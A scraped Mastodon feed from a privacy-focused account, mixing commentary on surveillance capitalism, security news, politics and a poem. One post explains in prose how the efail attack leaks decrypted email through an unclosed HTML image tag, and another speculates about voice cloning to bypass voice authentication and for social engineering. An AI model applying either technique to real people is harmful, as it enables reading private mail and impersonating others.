krypteia @krypteia@mastodon.social
Lawyers and techies working on pro bono privacy projects in our spare time.
On behalf of the #privacy community that has long been saying that #SurveillanceCapitalism is fundamentally incompatible with democracy and a graver national security threat than terrorism, I'd like to say:
We fucking told you so!
#Russian influence campaigns
#CambridgeAnalytica
#Mercer family / #Bannon culture wars
Today's BGP hijack of Cloudflare's 1.1.1.1 DNS service to an AS in China demonstrates how using a centralized DNS service is dangerous.
Running a recursive resolver, preferably with DNSSEC validation and enforcement, should help mitigate issues like what happened this morning.
Catching up on #security news.
#efail, #throwhhammer, more #spectre, #electron vulnerabilities... Everything is as terrible as I remember.
#efail attack to decrypt and exfiltrate pgp or s/mime encrypted email is pretty hilarious.
Intercept an encrypted email and modify the email to add an HTML image URL directed to your malicious domain. Leave the image tag open (without closed quotes) and paste in the encrypted email and then close the image tag. Most clients will decrypt the text and query the malicious domain looking for an image matching the decrypted text.
This is why we encrypt and authenticate kids.
efail.de
Apparently declaring #privacy to be dead, just because your business model requires it, does not make it so.
Some things are only born posthumously.
RT @tqbf@birdsite.link
Presenting Cryptopals Set 8 challenge 6: KEY RECOVERY ON BIASED ECDSA NONCES. https://toadstyle.org/cryptopals/76f2e314809b2a34ce9ff0d2a08f7a7f.txt
Every DSA signature needs a random nonce, but not every DSA signature truly has one. With even a _bias_ in the nonce, a little linear algebra recovers keys.
Cryptocurrency hot take Show more
Some great resources for redteamers https://medium.com/@adam.toscher/top-five-ways-the-red-team-breached-the-external-perimeter-262f99dc9d17 #redteam #pentest #offsec
roses are red
violets are blue
in surveillance capitalism
poem reads you
and shows you ads
for flower shops
and tracks your clicks
and never stops
it cares not about
if privacy's harmed
the money is green
when people are farmed
twitter is cyan
facebook is blue
your friends are the product
and so are you
Ohai!
I am toot. You click star, click boostybutton, author find out you exist. Might check you out.
Me bait, you fish.
Honest question for #infosec:
How practical is real-time voice synthesis (i.e. to reliably mimic a known target's voice and make it say what you want in a real conversation)? Assuming access to a large sample set (say a Skype scale dataset ;p), it seems like a much easier problem than real-time video fakes.
Anyway, it seems like there is an interesting class of exploits for such tech (from bypassing "your voice is your password" systems to social engineering).
I may do a patent search later.
US Politics Show more
Wha?
#Guccifer 2.0 outed as a GRU officer after failing to activate VPN before logging in. Doh!
Most importantly, stop putting institutional events on Facebook, stop using it at universities, stop making participation in Facebook mandatory through your institutional, organization, and activist roles. You can be online, and social, and connected without supporting Facebook.
On behalf of the #privacy community that has long been saying that #SurveillanceCapitalism is fundamentally incompatible with democracy and a graver national security threat than terrorism, I'd like to say:
We fucking told you so!
#Russian influence campaigns
#CambridgeAnalytica
#Mercer family / #Bannon culture wars
When online platforms over-censor, marginalized communities are often the first people silenced. We must stop FOSTA. https://act.eff.org/action/stop-fosta
The Internet lost a hero today. EFF is mourning the loss of our visionary co-founder, John Perry Barlow. https://www.eff.org/deeplinks/2018/02/john-perry-barlow-internet-pioneer-1947-2018
โIn a new project, the RSA and DeepMind are creating space for citizens to consider trade-offs in the use of AIโ (https://www.thersa.org/discover/publications-and-articles/rsa-blogs/2017/10/the-role-of-citizens-in-developing-ethical-ai)
Hereโs the letter I sent the RSA, both as a fellow and as someone who has presented an RSA talk on the subject, on how their partnership with Google/DeepMind/Alphabet, Inc. and this framing legitimises the false dichotomy at the heart of #SurveillanceCapitalism that there is a necessary tradeoff between modern technology and #privacy. https://mastodon.ar.al/media/DLpOYZB7IQpDYnzTq1U
"Weasels and liars never hold the field"
A good day to show your support for the #FBI which, despite its many faults, remains an institution of integrity.
